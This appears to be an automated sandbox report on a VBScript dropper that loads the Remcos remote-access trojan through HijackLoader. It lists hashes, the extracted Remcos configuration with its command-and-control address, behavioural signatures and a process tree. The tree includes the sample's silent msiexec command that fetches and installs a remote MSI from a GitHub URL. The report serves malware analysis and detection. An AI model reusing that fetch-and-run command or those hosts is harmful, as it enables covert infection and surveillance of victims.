Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
-
submitted
31-01-2025 03:48
General
-
Target
41590f3a8ba3c910f11fd5fa095856d5bc556f20fa4fd6d269aa1be4e08b4c64.vbs
-
Size
512B
-
MD5
bcc1d6a3c9aeec994cd31f86ada37ae6
-
SHA1
0b7bb7af96d842cfbb7a89793a4292fec4289a8c
-
SHA256
41590f3a8ba3c910f11fd5fa095856d5bc556f20fa4fd6d269aa1be4e08b4c64
-
SHA512
8793e62dc4a9465ef5254e15b3471573a242705dfdf74bd3d09d97c10dd84daf69aa8c0b5c9bc3c5a7302e431fc2ed417b1e6c194da106765e50ad385ea955b7
Malware Config
Extracted
remcos
v2
185.157.162.126:1995
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
qsdazeazd-EL00KX
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Detects HijackLoader (aka IDAT Loader) 1 IoCs
-
HijackLoader
HijackLoader is a multistage loader first seen in 2023.
-
Hijackloader family
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Remcos family
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 1 IoCs
-
Loads dropped DLL 7 IoCs
-
Use of msiexec (install) with remote resource 1 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Windows directory 9 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 48 IoCs
-
Suspicious use of WriteProcessMemory 17 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\41590f3a8ba3c910f11fd5fa095856d5bc556f20fa4fd6d269aa1be4e08b4c64.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi" /qn2⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F03285AA75E3F0B8EE8507D961C853AB2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\EHttpSrv.exe"C:\Users\Admin\AppData\Local\EHttpSrv.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe3⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\EHttpSrv.exeC:\Users\Admin\AppData\Local\EHttpSrv.exe4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD557c005c17a29e5a2288b77e48e519b5e
SHA1ee0e0539679deec71959e0bed493008da4811987
SHA2562e2ed2c695804a2845a850e78ba88e9a121ab4d905c8fe7e8ec34e00c299d050
SHA51268aff6768449408837d77029c438acd79cf9fec12647d05658e77fde5a412b40594300bcdb0d2e583f93dd5908b7bb299bb74d0cdd1f85f02bc59339a97c4097
-
Filesize
20KB
MD59329ba45c8b97485926a171e34c2abb8
SHA120118bc0432b4e8b3660a4b038b20ca28f721e5c
SHA256effa6fcb8759375b4089ccf61202a5c63243f4102872e64e3eb0a1bdc2727659
SHA5120af06b5495142ba0632a46be0778a7bd3d507e9848b3159436aa504536919abbcacd8b740ef4b591296e86604b49e0642fee2c273a45e44b41a80f91a1d52acc
-
Filesize
1.0MB
MD5686b224b4987c22b153fbb545fee9657
SHA1684ee9f018fbb0bbf6ffa590f3782ba49d5d096c
SHA256a2ac851f35066c2f13a7452b7a9a3fee05bfb42907ae77a6b85b212a2227fc36
SHA51244d65db91ceea351d2b6217eaa27358dbc2ed27c9a83d226b59aecb336a9252b60aec5ce5e646706a2af5631d5ee0f721231ec751e97e47bbbc32d5f40908875
-
Filesize
1.0MB
MD5ee51183d14415742fd29dae8c5006aa7
SHA1273ea820eed9747974ddc58547c3c80b22d7c0c1
SHA256fdc2c26f8cdc89b136f3c6faec3123df082625f9f3028f0e02ac6ee9277098cf
SHA5127ef950ffd7ae16a424c0bde1a061c2f4db200842af446c24c0160a37bfbd12a04cf7af47a01e50f1f6f1618f600a17fe4c564e55a5348797ecb7d320e1cb7aae
-
Filesize
877KB
MD55124236fd955464317fbb1f344a1d2f2
SHA1fe3a91e252f1dc3c3b4980ade7157369ea6f5097
SHA256ed1389002cdf96c9b54de35b6e972166ee3296d628943fd594a383e674c5cba6
SHA5122b2ac23244b16f936ef9a4049586f58c809fcc4391a56390cc5db2e8d96140001e0b977680ed1d8b0ab9c410e865a880209e22add8d42e563dc40bc91236b252
-
Filesize
883KB
MD54366cd6c5d795811822b9ccc3df3eab4
SHA130f6050729b4c08b7657454cb79dd5a3d463c606
SHA25655497a3eced5d8d190400bcd1a4b43a304ebf74a0d6d098665474ed4b1b0e9da
SHA5124a56a2da7ded16125c2795d5760c7c08a93362536c9212cff3a31dbf6613cb3fca436efd77c256338f5134da955bc7ccc564b4af0c45ac0dfd645460b922a349
-
Filesize
3.0MB
MD55d8dc4f7c58f4681dee4ee9f6ecc3498
SHA13eb23e362ecba770d842e99dd6bf386f1b6c0b47
SHA2564fda049f94e2b9127b71cb11588cac6b379d4dddab47f6e2f028fdaaf79ad8d3
SHA512765fa345c0fb369795e54e0506b6a8caebbffce1c7cbdf061520d9ece9a15b840fec967de692314e42b30ef29df1612dc12e70f19b1b87d6cbabc473b4f9558e
-
Filesize
557KB
MD52c9c51ac508570303c6d46c0571ea3a1
SHA1e3e0fe08fa11a43c8bca533f212bdf0704c726d5
SHA256ff86c76a8d5846b3a1ad58ff2fd8e5a06a84eb5899cdee98e59c548d33335550
SHA512df5f1def5aac44f39a2dfde9c6c73f15f83a7374b4ad42b67e425ccb7ac99a64c5701b676ae46d2f7167a04a955158031a839e7878d100aaf8fab0ce2059f127
-
Filesize
2.0MB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
18.3MB
-
Filesize
2.0MB
-
Filesize
528KB
-
Filesize
528KB
-
Filesize
528KB
-
Filesize
528KB
-
Filesize
528KB
-
Filesize
528KB
-
Filesize
528KB
-
Filesize
528KB
-
Filesize
528KB
-
Filesize
528KB